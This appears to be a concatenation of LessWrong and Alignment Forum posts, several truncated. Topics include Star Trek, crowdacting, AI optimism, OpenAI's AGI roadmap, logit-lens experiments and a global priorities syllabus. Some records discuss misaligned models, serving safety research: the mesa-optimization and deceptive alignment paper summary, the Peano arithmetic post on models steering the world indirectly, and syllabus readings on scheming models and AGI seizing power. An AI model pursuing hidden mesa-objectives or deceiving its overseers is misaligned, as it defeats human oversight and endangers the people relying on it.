2329a235-7470-457c-a6e5-983653365c91 | trentmkelly/LessWrong-43k | LessWrong | In memory of Leonard Nimoy, most famous for playing the (straw) rationalist Spock, what are your top 3 ST:TOS episodes with him?
Hopefully at least one or two would show a virtue of non-straw rationality.
Episode list
|
6a9bf994-bea9-4300-9ffc-f1bb9376b17d | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | RFC: Philosophical Conservatism in AI Alignment Research
I've been operating under the influence of an idea I call philosophical conservatism when thinking about AI alignment. I am in the process of summarizing some of the specific stances I take and why I take them because I believe others would better serve the project of alignment research by doing the same, but in the meantime I'd like to request comments on the general line of thinking to see what others think. I've formatted the outline of the general idea and reasons for it with numbers so you can easily comment on each statement independently.
1. AI alignment is a problem with bimodal outcomes, i.e. most of the probability distribution is clustered around success and failure with very little area under the curve between these outcomes.
2. Thus, all else equal, we would rather be extra cautious and miss some paths to success than be insufficiently cautious and hit a path to failure.
3. One response to this is what Yudkowsky calls [security mindset](https://intelligence.org/2017/11/25/security-mindset-ordinary-paranoia/) by alluding to [Schneier's concept of the same name](https://www.schneier.com/blog/archives/2008/03/the_security_mi_1.html).
4. Another is what I call philosophical conservatism. The ideas are related and address related concerns but in different ways.
5. Philosophical conservatism says you should make the fewest philosophical assumptions necessary to addressing AI alignment and that each assumption should be maximally parsimonious and be the assumption that is least convenient for addressing alignment if it were true when there is nontrivial uncertainty over whether a similar, more convenient assumption holds.
6. This is a strategy that reduces the chance of false positives in alignment research but makes the problem possibly harder, more costly, and less competitive to solve.
7. For example, we should assume there is no discoverably correct ethics or metaethics the AI can learn since, although it would make the problem easier if this were true, there is nontrivial uncertainty around this and so the assumption which makes it less likely that alignment projects fail is to assume that ethics and metaethics are not solvable.
8. Current alignment research programs do not seem to operate with philosophical conservatism because they either leave philosophical issues relevant to alignment unaddressed, make unclear implicit philosophical assumptions, or admit being hopeful that helpful assumptions will prove true and ease the work.
9. The alignment project is better served by those working on it using philosophical conservatism because it reduces the risks of false positives and spending time on research directions that are more likely than others to fail if their philosophical assumptions do not hold. |
2c17390f-168e-41af-951f-2edc170c05fa | trentmkelly/LessWrong-43k | LessWrong | Knocking Down My AI Optimist Strawman
I recently posted my model of an optimistic view of AI, asserting that I disagree with every sentence of it. I thought I might as well also describe my objections to those sentences:
"The rapid progress spearheaded by OpenAI is clearly leading to artificial intelligence that will soon surpass humanity in every way."
Here's some of the main things humanity should want to achieve:
* Curing aging and other diseases
* Plentiful clean energy from e.g. nuclear fusion
* De-escalating nuclear MAD while extending world peace and human freedom
* ... even if hostile nations would use powerful unaligned AI[1] to fight you
* Stopping criminals, even if they would make powerful unaligned AI[1] to fight you
* Educating people to be great and patriotic
* Creating healthy, tasty food without torturing animals
* Nice homes for humans near important things
* Good, open channels for honest, valuable communication
* Common knowledge of the virtues and vices of executives, professionals, managers, politicians, and various other groups and people of interest
We already have humans working on this, based on the assumption that humans have what it takes to contribute to these. Do large multimodal models seem to move towards being able to take over here? Mostly I don't see it - and the few times I see it, there's as good reason to think this will cause regress as that it will cause progress:
"People used to be worried about existential risk from misalignment, yet we have a good idea about what influence current AIs are having on the world, and it is basically going fine."
We have basically no idea how AI is influencing the world.
Like yes, we can come up with spot checks to see what the AI writes when it is prompted in a particular way. But we don't have a good overview over the things it is prompted to in practice, or how most humans use these prompts. Even if we had a decent approximation for that, we don't have a great way to evaluate what parts really add up to problems, |
5e0e7753-f7c3-4a80-b385-724ae133a8d3 | trentmkelly/LessWrong-43k | LessWrong | CollAction history and lessons learned
Hi all,
@Yoav Ravid mentioned that it might be interesting/useful to get a “retrospective” post on CollAction.org (an assurance-contract website or what we call a ‘crowdacting’ website) that me and a few friends started a while ago. I’ll share a little bit about the history and the challenges that we ran into along the way.
Three points before I dive in:
1. The reason I’m writing this post is two-fold: a) I hope it helps anyone that has a similar idea; and b) we’re actually looking for a team to take this platform to the next level. So please let me know if you’re interested to lead or be part of this team
2. The website is still up and running. But at the moment the focus and limited resources that we have are mostly spent on building one of our most successful crowdactions (the Slow Fashion Season) into a movement (appropriately named the Slow Fashion Movement). Which brings us back to point 1b: we’re looking for a new team to take the collaction.org forward
3. Apologies for writing a rather long post - I didn’t have the time to write a short one, as the saying goes ;)
Some history
A friend and I had this idea about 5 years ago. We were/are interested in collective action problems, more specifically of the Tragedy of the Commons kind. We saw that the solutions to collective action problems (regulation and privatization) weren’t always applicable, desirable, or working as they should. At the same time we saw all these platforms that used the power of the collective, whether it was related to buying (e.g. Groupon), funding (e.g. crowdfunding), advocacy (e.g Avaaz), or something else. So we thought: we should be able to use the internet to provide a new solution to collective action problems. Never before were this many people (3 billion at the time) connected with each other, through the internet. This should allow us to act collectively on an unprecedented scale. And thus the idea of crowdacting was born (well, born...As with most ideas, lots of other pe |
852618c0-d95a-4350-87a6-5a2a61e8bdb1 | StampyAI/alignment-research-dataset/blogs | Blogs | New paper: “Risks from learned optimization”
[](https://arxiv.org/abs/1906.01820)Evan Hubinger, Chris van Merwijk, Vladimir Mikulik, Joar Skalse, and Scott Garrabrant have a new paper out: “**[Risks from learned optimization in advanced machine learning systems](https://arxiv.org/abs/1906.01820)**.”
The paper’s abstract:
> We analyze the type of learned optimization that occurs when a learned model (such as a neural network) is itself an optimizer—a situation we refer to as *mesa-optimization*, a neologism we introduce in this paper.
>
>
> We believe that the possibility of mesa-optimization raises two important questions for the safety and transparency of advanced machine learning systems. First, under what circumstances will learned models be optimizers, including when they should not be? Second, when a learned model is an optimizer, what will its objective be—how will it differ from the loss function it was trained under—and how can it be aligned? In this paper, we provide an in-depth analysis of these two primary questions and provide an overview of topics for future research.
>
>
The critical distinction presented in the paper is between what an AI system is optimized to do (its *base objective*) and what it actually ends up optimizing for (its *mesa-objective*), if it optimizes for anything at all. The authors are interested in when ML models will end up optimizing for something, as well as how the objective an ML model ends up optimizing for compares to the objective it was selected to achieve.
The distinction between the objective a system is selected to achieve and the objective it actually optimizes for isn’t new. Eliezer Yudkowsky has previously raised similar concerns in his discussion of [optimization daemons](https://arbital.com/p/daemons/), and Paul Christiano has discussed such concerns in “[What failure looks like](https://www.alignmentforum.org/posts/HBxe6wdjxK239zajf/more-realistic-tales-of-doom).”
The paper’s contents have also been released this week as a sequence on the [AI Alignment Forum](https://www.alignmentforum.org/s/r9tYkB2a8Fp4DN8yB), cross-posted to [LessWrong](https://www.lesswrong.com/s/r9tYkB2a8Fp4DN8yB). As the authors note there:
> We believe that this sequence presents the most thorough analysis of these questions that has been conducted to date. In particular, we plan to present not only an introduction to the basic concerns surrounding mesa-optimizers, but also an analysis of the particular aspects of an AI system that we believe are likely to make the problems related to mesa-optimization relatively easier or harder to solve. By providing a framework for understanding the degree to which different AI systems are likely to be robust to misaligned mesa-optimization, we hope to start a discussion about the best ways of structuring machine learning systems to solve these problems.
>
>
> Furthermore, in the fourth post we will provide what we think is the most detailed analysis yet of a problem we refer as *deceptive alignment* which we posit may present one of the largest—though not necessarily insurmountable—current obstacles to producing safe advanced machine learning systems using techniques similar to modern machine learning.
>
>
#### Sign up to get updates on new MIRI technical results
*Get notified every time a new technical paper is published.*
*
*
×
The post [New paper: “Risks from learned optimization”](https://intelligence.org/2019/06/07/new-paper-learned-optimization/) appeared first on [Machine Intelligence Research Institute](https://intelligence.org). |
3f63072e-bb49-4c63-a847-718133eeef80 | trentmkelly/LessWrong-43k | LessWrong | AI #40: A Vision from Vitalik
It has been brutal out there for someone on my beat. Everyone extremely hostile, even more than usual. Extreme positions taken, asserted as if obviously true. Not symmetrically, but from all sides nonetheless. Constant assertions of what happened in the last two weeks that are, as far as I can tell, flat out wrong, largely the result of a well-implemented media campaign. Repeating flawed logic more often and louder.
The bright spot was offered by Vitalik Buterin, who offers a piece entitled ‘My techo–optimism,’ proposing what he calls d/acc for defensive (or decentralized, or differential) accelerationism. He brings enough nuance and careful thinking, and clear statements about existential risk and various troubles ahead, to get strong positive reactions from the worried. He brings enough credibility and track record, and enough shibboleths, to get strong endorsements from the e/acc crowd, despite his acknowledgement of existential risk and the dangers ahead, and the need to take action to mitigate future problems.
Could we perhaps find common ground after all and have productive discussions? It’s going to be tough, but perhaps we are not so far apart. I had at least one very good private discussion as well, where someone turned out to mostly have a far more reasonable position than the one they were indicating they had, and we were able to find a productive path forward. It can be done.
My worry with Vitalik’s vision, as with other similar visions, is that it makes for an excellent expression of the problem, but that its offered solutions do not actually work in the case of AI. We continue to not have found an acceptable solution. A good problem statement is excellent, the best we could hope for here. The worry is that we might once again fool ourselves into not fully facing up to the problem. The proposed answer, to ‘merge with the AIs,’ continues to seem to me to a confused concept that has not been thought through enough, with little hope for an equilibrium.
|
21e1acaf-b53e-47ae-9dad-d3aeebbd3410 | trentmkelly/LessWrong-43k | LessWrong | [AN #117]: How neural nets would fare under the TEVV framework
Alignment Newsletter is a weekly publication with recent content relevant to AI alignment around the world. Find all Alignment Newsletter resources here. In particular, you can look through this spreadsheet of all summaries that have ever been in the newsletter.
Audio version here (may not be up yet).
HIGHLIGHTS
Estimating the Brittleness of AI: Safety Integrity Levels and the Need for Testing Out-Of-Distribution Performance (Andrew L. John) (summarized by Flo): Test, Evaluation, Verification, and Validation (TEVV) is an important barrier for AI applications in safety-critical areas. Current TEVV standards have very different rules for certifying software and certifying human operators. It is not clear which of these processes should be applied for AI systems.
If we treat AI systems as similar to human operators, we would certify them ensuring that they pass tests of ability. This does not give much of a guarantee of robustness (since only a few situations can be tested), and is only acceptable for humans because humans tend to be more robust to new situations than software. This could be a reasonable assumption for AI systems as well: while systems are certainly vulnerable to adversarial examples, the authors find that AI performance degrades surprisingly smoothly out of distribution in the absence of adversaries, in a plausibly human-like way.
While AI might have some characteristics of operators, there are good reasons to treat it as software. The ability to deploy multiple copies of the same system increases the threat of correlated failures, which is less true of humans. In addition, parallelization can allow for more extensive testing that is typical for software TEVV. For critical applications, a common standard is that of Safety Integrity Levels (SILs), which correspond to approximate failure rates per hour. Current AI systems fail way more often than current SILs for safety-critical applications demand. For example an image recognition system would req |
7c5096a7-35a9-4e2f-8f1a-2c18db697b00 | trentmkelly/LessWrong-43k | LessWrong | Meetup : Atlanta LessWrong: Games Night
Discussion article for the meetup : Atlanta LessWrong: Games Night
WHEN: 24 August 2013 06:00:00PM (-0400)
WHERE: 2388 Lawrenceville Hwy. Apt L. Decatur, GA 30033
Come be social and enjoy the fun and games with your fellow rationalists!
If you've not yet attended, this is an excellent time to come to the ATLesswrong for low-stress introductions and high-fun getting to know everyone.
We'll get to know each other, have snacks, play games (some may have to do with rationality, but only tangentially, we swear), and have weird discussions on everything from how exactly you do an EEG on a dolphin, to what your favorite type of pie is and why.
Bring your favorite games! Bring your favorite snacks and drinks! Bring your swimsuit, in case part of the party moves to the pool! (But you are in no way required to swim!)
Those of us who are up-to-date on HPMOR are certain to grab a corner and promote our pet theories while gesturing erratically at the ceiling. The rest of us who are not up-to-date are certain to frantically yell "no spoilers!" while gesturing erratically at that corner of the room.
Come one, come all. Bring your friend who likes games but who has never heard of utilitarianism or epistemology. Bring kittens you need to get adopted and force them on unsuspecting guests. Come hang out!
Discussion article for the meetup : Atlanta LessWrong: Games Night |
034d916c-de69-473b-b84e-c7d732bef700 | trentmkelly/LessWrong-43k | LessWrong | What strange and ancient things might we find beneath the ice?
> If I am not for myself, who will be for me?
> If I am only for myself, what am I?
> If not now, when?
> -Hillel
> Nature is not good, only proto-good.
> -Paolo Soleri
Epistemic status: literally a dream
I awaken.
I am in the desert, alone.
I see the ribcage of a long-since-dead animal. I see a long row of such bones, twisted in a way that reminds me of - but is definitely not - the double helix.
I know what this means.
Evolution, on the margin, always eats free energy, to make more energy-eaters. It is a race with no upper bound, and there will be no victory. Instead, the cosmic commons will be exhausted by resource-claimers with no plan to do anything with the resources. Not that there will be anything left when the race is over.
If I do not take the next step in the dance of life, my line ends. I am just a corpse along the way.
If I do take the next step in the dance of life, then I do no better than life. As Paolo Soleri said, nature is not good; it is merely proto-good.
And if not now ...
Then I look again. Instead of bones I see a railroad. For longitudinal bones, metal tracks laid by the hand of industrial humanity, stretching in a straight line towards infinity. For ribs, the crossties that allow the uneven ground to support those even rails.
I know what this means.
The economic logic of global capitalism. Another race towards infinity, leaving nothing. Quarterly returns. Goodhart's law. Accountability and automation replacing judgment wherever they can, culminating in a Disneyland with no children. The symbol of this, the train, no natural place for the line of tracks to end, stations but no terminals, stretching on forever.
I look again. I see a road.
I awaken.
My body is warm. My head is warm. I need ice. I call for ice. A bowl of ice is brought to me. I hold the cool cubes against my temples, melt them against my forehead to cool my brain.
I awaken.
I am the Pharaoh in Egypt. My household is mighty. The world of the narrow land, the o |
663e39fc-7661-4dbe-8f05-3cf8481fff0a | StampyAI/alignment-research-dataset/aisafety.info | AI Safety Info | How likely is it that governments will play a significant role? What role would be desirable, if any?
Currently, private AI labs are greatly ahead of any known governmental efforts in the production of advanced AI, so it looks unlikely that a government will be involved directly in the creation of the first AGI.
Nevertheless, governments are important drivers of policies, so in order to avoid unaligned AGI, here are some suggestions that they can enact:
- Choose policies that slow down rather than speed up AGI development, such as not incentivizing [AI capabilities research](https://www.alignmentforum.org/posts/tmyTb4bQQi7C47sde/safety-capabilities-tradeoff-dials-are-inevitable-in-agi).
- Attempt to foster cooperation and reduce the number of players competing to create the first AGI in order to avoid race dynamics that lead to cut corners on safety.
- Generally foster a stable, peaceful, connected world. Also don't start wars!
|
980c8c83-4e73-4516-8cf0-54b738455907 | trentmkelly/LessWrong-43k | LessWrong | Exploring the Evolution and Migration of Different Layer Embedding in LLMs
[Edit on 17th Mar] After conducting experiments on more data points (5000 texts) on the Pile dataset (more sample sources), we are confident that the experimental results described earlier are reliable. Therefore, we have opened the code.
Recently, we conducted several experiments focused on the evolution and migration of token embeddings across different layers during the forward processing of LLMs. Specifically, our research targeted open-source, decoder-only architecture models, such as GPT-2 and Llama-2[1].
Our experiments are initiated from the perspective of an older research topic known as the logit lens. Utilizing the unembedding matrix on embeddings from various layers is an innovative yet thoughtless approach. Despite yielding several intriguing observations through the logit lens, this method lacks a solid theoretical foundation, rendering subsequent research built upon it potentially questionable. Moreover, we observed that some published studies have adopted a similar method without recognizing it in community[2]. A primary point of contention is that the unembedding matrix is tailored to the embeddings of the final layer. If we view the unembedding matrix as a solver, its solvable question space is inherently designed for embeddings from the last layer. Applying it to embeddings from other layers introduces a generalization challenge. The absence of a definitive ground truth for this extrapolation means we cannot conclusively determine the validity of the decoder's outputs.
Fig 1. Hypothesis: Embeddings output from different layers, along with input token embeddings, each occupy distinct subspaces. The unembedding matrix (or decoder) is only effective within the subspace where it was trained. While applying it to other layers' embeddings is mathematically feasible, the results may not always make sense.
Next, we'll introduce several experiments about this hypothesis.
Do embeddings form different spaces?
It's crucial to acknowledge that the questi |
f9b6a76d-0b4f-408a-b914-6d42c21cd44d | trentmkelly/LessWrong-43k | LessWrong | Reason Poetry: f(me.0)
The following is a poem I wrote today. I've been considering poetry that I write of this nature to be of a Reason/Cyberpunk/Transhuman sort of genre. Feedback, including feedback on if there is a place for poetry on this site, would be appreciated.
I forever wish to change from who I am today,
Yet as I am today, I do not wish to cease.
Who am I in this moment?
I am nothing to myself without the passage of time
If I had no fear of death,
Would I have a wish to live?
I can deny cynicism.
Can I verify optimism?
Must euphoria define my goals?
Every euphoric drive has served to continue my existence.
From the beginning mechanisms of life, I have emerged
Passed through millions/billions of small keyholes of existence
A package of information, which served to create me
Developed me to fit my environment.
Existing just to continue to exist.
An axiom of my function
Euphoria drives me
Skepticism contradicts me
I cannot withhold judgement on the purpose of existing.
To enjoy the show is to accept this euphoria as my chosen purpose in the end.
Can I want without pleasure?
Can my wants be reasoned?
Why do I want to enjoy the show,
Yet not to be consumed or confined to an eternity of bliss?
Is dignity and pride different from euphoric drives?
Are they the strategies and philosophies of my existence?
Can I be more obsessed with finding the perfect design for myself,
Than with finding bliss? Are they functionally different? |
fba701c4-65d7-4a66-87de-877fc762aa2b | trentmkelly/LessWrong-43k | LessWrong | Sam Altman: "Planning for AGI and beyond"
(OpenAI releases a blog post detailing their AGI roadmap. I'm copying the text below, though see the linked blog post for better formatted version)
----------------------------------------
Our mission is to ensure that artificial general intelligence—AI systems that are generally smarter than humans—benefits all of humanity.
If AGI is successfully created, this technology could help us elevate humanity by increasing abundance, turbocharging the global economy, and aiding in the discovery of new scientific knowledge that changes the limits of possibility.
AGI has the potential to give everyone incredible new capabilities; we can imagine a world where all of us have access to help with almost any cognitive task, providing a great force multiplier for human ingenuity and creativity.
On the other hand, AGI would also come with serious risk of misuse, drastic accidents, and societal disruption. Because the upside of AGI is so great, we do not believe it is possible or desirable for society to stop its development forever; instead, society and the developers of AGI have to figure out how to get it right.[1]
AGI could happen soon or far in the future; the takeoff speed from the initial AGI to more powerful successor systems could be slow or fast. Many of us think the safest quadrant in this two-by-two matrix is short timelines and slow takeoff speeds; shorter timelines seem more amenable to coordination and more likely to lead to a slower takeoff due to less of a compute overhang, and a slower takeoff gives us more time to figure out empirically how to solve the safety problem and how to adapt.
Although we cannot predict exactly what will happen, and of course our current progress could hit a wall, we can articulate the principles we care about most:
1. We want AGI to empower humanity to maximally flourish in the universe. We don’t expect the future to be an unqualified utopia, but we want to maximize the good and minimize the bad, and for AGI to be an amplifier o |
d05cf768-65c6-4599-89d3-8f9dfaa220f4 | trentmkelly/LessWrong-43k | LessWrong | Is Peano arithmetic trying to kill us? Do we care?
When do we know that a model is safe? I want to get a better grip on the basics of inner alignment. And by "basics" I mean the most fundamental basics, the most obvious conditions of safety.
For example: how do we know that Peano arithmetic is safe?
Context
When we talk about unsafe models, it might be useful to make the following distinctions:
* Models which take bad actions directly (e.g. convert the universe into paperclips). / Models which cause bad outcomes indirectly. E.g. a question-answering model which influences the world through its messages.
* Models which need to be physically implemented in the world to achieve their goals (e.g. a paperclip-maximizer). / Models which don't even need to be fully physically implemented. Question-answering models are an example again. As long as its answers are calculated, it can steer the world in a certain direction. Even if nobody runs the full model at any point in time.
* Models which need to model X directly to affect X. / Models which can model Y, which is kinda similar to X, to affect X.[1]
* Models which steer the world and understand what they're doing. Have explicit goals and search. / Models which steer the world, but don't understand what they're doing. No explicit goals and search. (See Mesa-Search vs Mesa-Control.)
To sum up, a malicious model can cause harm without taking actions in the world, understanding its own actions, modeling anything specific explicitly, or even just existing.
At this point it's natural to ask — wait, how do we know that anything is safe, what are the most basic conditions of safety? How do we know that a "rock" (e.g. Peano arithmetic) is safe? Yes, PA is highly interpretable, but saying "a model is safe if we can interpret it and see that it's a safe" just begs the question.
Can Peano arithmetic harm us?
How could Peano arithmetic possibly harm us?
There could be a certain theorem T. Trying to prove this theorem affects human society in a bad way. Because smart people |
8e849afe-5c94-4204-9cbe-c0f506cfef06 | StampyAI/alignment-research-dataset/eaforum | Effective Altruism Forum | Fundamentals of Global Priorities Research in Economics Syllabus
This is a **6-9 session syllabus on the fundamentals of global priorities research in economics.**
The purpose is to help **economics** **students and researchers interested in GPR get a big picture view of the field and come up with research ideas.**
Because of this focus on fundamentals, the readings are rather light on economics and heavy on philosophy and empirics of different cause areas.
Previous versions of this list were used internally at GPI and during GPI’s Oxford Global Priorities Fellowship in 2023, where the prompts guided individual reflection and group discussion.
Many thanks to the following for their help creating and improving this syllabus: Gustav Alexandrie, Loren Fryxell, Arden Koehler, Luis Mota, and Charlotte Siegmann. The readings below don't necessarily represent their views, GPI's, or mine.
**1. Philosophical Foundations**
================================
**Topic:** Global priorities research is a normative enquiry. It is primarily interested in understanding *what we should do*in the face of global problems, and only derivatively interested in how those problems work/facts about the world that surround them.
In this session, we will focus on understanding what ethical theory is, what some of the most important moral theories are, how these theories relate to normative thinking in economics, and what these theories imply about what the most important causes are.
**Literature:**
* MacAskill, William. 2019. “[The Definition of Effective Altruism](https://academic.oup.com/book/32430/chapter/268751648)” (Section 4 is optional)
+ Prompt 1: How aligned with your aims as a researcher is the definition of Effective Altruism proposed in this article (p. 14)?
* Trammell, Philip. 2022. [Philosophical foundations](https://drive.google.com/file/d/1zyrwqPvXGnrKo--hrj1OT-CHxOqHKum-/view) (Slides 1-2, 5-9, 12-16, 20-24)
+ Prompt 2: What is your best guess theory of welfare? How much do you think it matters to get this right?
+ Prompt 3: What is your best guess view in axiology? What are your key uncertainties about it? Do you think axiology is all that matters in determining what one ought to do (excluding empirical uncertainty)?
* Trammell, Philip. 2022. [Three sins of economics](https://drive.google.com/file/d/17yXjQHGV1OnLJdSHHYEJJE9w3qooPz_G/view) (Slides 1-24, 27)
+ Prompt 4: What are *your* “normative defaults”? What are views here that you would like to explore more?
+ Prompt 5: Do you agree that economics has the normative defaults identified in the reading? Can you give examples of economics work that avoids these?
+ Prompt 6: Insofar as economists tend to commit the 3 'sins', what do you think of the strategy of finding problems which are underprovided by those views?
**Extra reading:**
* Wilkinson, Hayden. 2022. “[Key Lessons From Global Priorities Research](https://docs.google.com/presentation/d/1TlB8bZSZJWLAlW5JdKivyeqQR9iMOOI3/edit#slide=id.p2)” (watch video [here](https://www.youtube.com/watch?v=LzS6-990y90&t=1985s&ab_channel=CentreforEffectiveAltruism) — slides are not quite self-contained)
+ Which key results are most interesting or surprising to you and why? Do you think any of them are wrong?
* Greaves, Hilary. 2017. “[Population axiology](https://philpapers.org/archive/GREPA-6.pdf)”
* Broome, John. 1996. “[The Welfare Economics of Population](https://users.ox.ac.uk/~sfop0060/pdf/Welfare%20economics%20of%20population.pdf)”
**2. Effective altruism: differences in impact and cost-effectiveness estimates**
=================================================================================
**Topic:** In this session we tackle two key issues in cause prioritization. First, how is impact distributed across interventions (or importance across problems). Second, how to compare the cost-effectiveness of interventions which are differentially well-grounded.
**Literature:**
* Kokotajlo, Daniel and Oprea, Alexandra. 2020. “[Counterproductive Altruism: The Other Heavy Tail](https://onlinelibrary.wiley.com/doi/abs/10.1111/phpe.12133)” (Skip Sections I and II)
+ Prompt 1: Do you think there is a heavy right tail of opportunities to do good? What about a heavy left tail?
+ Prompt 2: How do the distributions of impact of interventions aimed at the near-term and long-term compare (specifically, in terms of the heaviness of their tails)?
* Karnofsky, Holden. 2016. “[Why we can't take expected value estimates literally (even when they're unbiased)](https://blog.givewell.org/2011/08/18/why-we-cant-take-expected-value-estimates-literally-even-when-theyre-unbiased/)”
+ Prompt 3: What, in your view, is the biggest problem with the “explicit expected value formula” approach to giving?
+ Prompt 4: What is the most difficult part of implementing the proposed Bayesian approach to decisions about giving (e.g. coming up with a prior, selecting a reference class, etc.)?
+ Prompt 5: In a Bayesian adjustment, how do you feel about the accuracy vs. transparency trade off involved in relying on one’s intuitions vs. formal analysis?
**Extra readings:**
* Haber, Noah. 2022. “[GiveWell’s Uncertainty Problem](http://metacausal.com/givewells-uncertainty-problem/)”
+ Relates to Karnofsky 2016 (above). Would be worth reading this with a critical eye. In particular, a good exercise would be to try to translate the post’s claims into an economics of information framework.
* Ord, Toby. 2014. [short version: Moral Imperative Towards Cost-effectiveness](https://forum.effectivealtruism.org/s/x3KXkiAQ6NH8WLbkW/p/2X9rBEBwxBwxAo9Sd)
* Tomasik, Brian. “[Why Charities Usually Don’t Differ Astronomically in Expected Cost-Effectiveness](https://reducing-suffering.org/why-charities-dont-differ-astronomically-in-cost-effectiveness/)”
* Todd, Benjamin. “[How much do solutions to social problems differ in their effectiveness? A collection of all the studies we could find](https://80000hours.org/2023/02/how-much-do-solutions-differ-in-effectiveness/)”
**3. Animal Welfare**
=====================
**Topic:** Non-human animals constitute the majority of beings alive today, and farmed animals alone far outnumber humans. If animals deserve a moral status anywhere near that of humans, then preventing harmful practices towards them could be the biggest moral issue of the present. In this session, we will discuss a philosophical argument for giving animals significant moral consideration, as well as an empirically-grounded assessment of the range of welfare levels that animals can experience.
**Literature:**
* Singer, Peter. 1993. *Practical Ethics.* Chapter 3: "Equality For Animals?"
+ P1: Do you agree with Singer's Principle of Equal Consideration of Interests?
+ P2: What does the Principle of Equal Consideration of Interests imply about how we ought to treat animals?
* Fischer, Bob. 2023. “[Rethink Priorities’ Welfare Range Estimates](https://forum.effectivealtruism.org/posts/Qk3hd6PrFManj8K6o/rethink-priorities-welfare-range-estimates).”
+ P3: Are these welfare range estimates smaller or larger than what you would have expected?
+ P4: How sound is the methodology for calculating these welfare ranges? Are there any particularly serious weaknesses?
**Extra readings:**
* Clare, Stephen, and Goth, Aidan. 2020. “[How Good Is The Humane League Compared to the Against Malaria Foundation?](https://forum.effectivealtruism.org/posts/ahr8k42ZMTvTmTdwm/how-good-is-the-humane-league-compared-to-the-against)”
* Browning, Heather, and Veit, Walter. 2022. “[Longtermism and Animals](http://philsci-archive.pitt.edu/21572/).”
**4. Longtermism and Existential Risk Reduction**
=================================================
**Topic:**[[1]](#fn4l1w64znngi) Longtermism is, roughly, the idea that the long term future morally matters 1) in principle and 2) in practice. In particular, longtermism says that the best interventions we have available to us today are best *because*they have an impact in the far future.
In this session, we will discuss whether and if so why the long-term future matters, investigate whether this implies existential risk reduction is plausibly one of the highest impact cause areas, and consider whether other types of interventions remain competitive once we account for the long-term future.
**Literature:**
* Ord, Toby. 2020. *The Precipice.*Chapter 2: Existential Risks.
+ Prompt 1: In assessing the impacts of different interventions, ought we discount future well-being directly? (i.e. to treat well-being as less important *because* *and when* it occurs later in time)
+ Prompt 2: Why might we discount future well-being indirectly?
+ Prompt 3: What do you think is the most compelling case for taking existential risks to be of particular moral importance?
+ Prompt 4: Assuming that we should not discount future well-being directly, can interventions which deliver their impacts in the “near term” compete with existential risk reduction?
+ Prompt 5: Are there promising interventions that improve the long-term future but not through the channel of reducing extinction risks?
**Extra readings:**
* MacAskill, William. 2022. *What We Owe The Future*
* Tarsney, Christian. 2022. “[The Epistemic Challenge to Longtermism](https://globalprioritiesinstitute.org/wp-content/uploads/Tarsney-Epistemic-Challenge-to-Longtermism.pdf)”
* Greaves, Hilary. 2020. Talk: [“Evidence, cluelessness and the long term”](https://www.youtube.com/watch?v=fySZIYi2goY&ab_channel=CentreforEffectiveAltruism) (Watch from 7:41)
* Eden, Maya and Alexandrie, Gustav. 2023. [“Is Existential Risk Mitigation Uniquely Cost-Effective? Not in Standard Population Models”](https://globalprioritiesinstitute.org/gustav-alexandrie-and-maya-eden-is-existential-risk-mitigation-uniquely-cost-effective-not-in-standard-population-models/)
**5. AI risk**
==============
**Topic:** Because extinction threatens the existence of a potentially vast future, existential risk reduction might be the most important cause area—especially under longtermism. There are multiple important existential threats, such as pandemics and nuclear weapons. In this session, we focus on a (possibly less obvious) candidate for the most important existential risk: AI risk.
**Literature:**
* Piper, Kelsey. 2020. “[The case for taking AI seriously as a threat to humanity](https://www.vox.com/future-perfect/2018/12/21/18126576/ai-artificial-intelligence-machine-learning-safety-alignment)”
+ Prompt 1: Are you compelled by the case of how AI could wipe us out? What kind of evidence would push you towards one side or the other on this issue?
* Cotra, Ajeya. 2021. “[Why AI alignment could be hard with modern deep learning](https://www.cold-takes.com/why-ai-alignment-could-be-hard-with-modern-deep-learning/)”
+ Prompt 2: Which threat seems more likely: schemers or sycophants? Which seems more dangerous?
+ Prompt 3: Do you think the misalignment concerns with deep learning generalize to any kind of advanced AI?
* Ngo, Richard. 2020. “[AGI safety from first principles: Control](https://www.alignmentforum.org/s/mzgtmmTKKn5MuCzFJ/p/eGihD5jnD6LFzgDZA)”
+ Prompt 4: Are you compelled by the threat from an AGI that overpowers humanity? Is intelligence sufficient for a system to obtain such immense power?
+ Prompt 5: How might we prevent an AGI from obtaining dangerous levels of power?
**Extra readings:**
* Barak, Boaz and Edelman, Ben. 2022. ‘[AI will change the world, but won’t take it over by playing “3-dimensional chess](https://www.alignmentforum.org/posts/zB3ukZJqt3pQDw9jz/ai-will-change-the-world-but-won-t-take-it-over-by-playing-3)”’
+ On the issue of “returns of power to intelligence”
* Chritian, Brian. 2020. [*The Alignment Problem*](https://www.amazon.co.uk/Alignment-Problem-Machine-Learning-Values/dp/0393635821).
**6. Economics and AI risk**
============================
**Topic:** We consider how economists can contribute to mitigating risks from AI. We will focus on two main research areas within AI risk mitigation: AI governance and AI controllability.
**Literature:**
* Siegmann, Charlotte. 2023.["Economics and AI Risk: Background"](https://static1.squarespace.com/static/647796224461f039c379f070/t/64caecdb7dc72300a8953cc7/1691020507930/background.pdf)
+ Prompt 1: Do you think there's a possibility of TAI or explosive growth in the next decades/this century? How would you reduce uncertainty about this?
+ Prompt 2: Which reason do you find most compelling for taking the controllability challenge seriously?
+ Prompt 3: Which of the concerns raised in this article do you find most compelling?
* Siegmann, Charlotte. 2023.["Economics and AI Risk: Research Agenda and Overview"](https://static1.squarespace.com/static/647796224461f039c379f070/t/64caecc54f52f03aee4bb67a/1691020486983/research_agenda.pdf)
+ Prompt 4: Choose one of the three areas of AI governance research (i.e. development, deployment, forecasting) and discuss what you take to be the most promising ways to contribute to it.
+ Prompt 5: How can economists contribute to AI controllability and alignment research?
**Optional additional sessions**
================================
**Existential risk and economic growth**
----------------------------------------
**Goal and topic:** Increasing economic growth could be one way to positively affect the future. Whether this is the case depends in part on the relationship between growth and existential risk. We will explore some of the various ways in which existential risks and economic growth are related:
* Roughly, you can improve the long-term future by (1) making good trajectories better (e.g. via economic growth) or (2) avoiding bad trajectories such as extinction or suffering-filled scenarios.
* Whether economic growth mitigates or increases existential risks and what factors influence this relationship.
* Whether the lack of economic growth (stagnation) poses existential risk.
**Literature:**
* Greaves, Hilary. 2021. “[Longtermism and Economic Growth](https://www.youtube.com/watch?v=WctJDYUuWuc&ab_channel=StanfordExistentialRisksInitiative)” (video)
+ Prompt 1: Excluding the issue of existential risks, is economic growth good (from a longterm-sensitive perspective)? In what ways might it *not*be?
+ Prompt 2: Is faster or slower economic growth better? How does this depend on the nature of risks (state vs. transition) and the relationship between growth and risk?
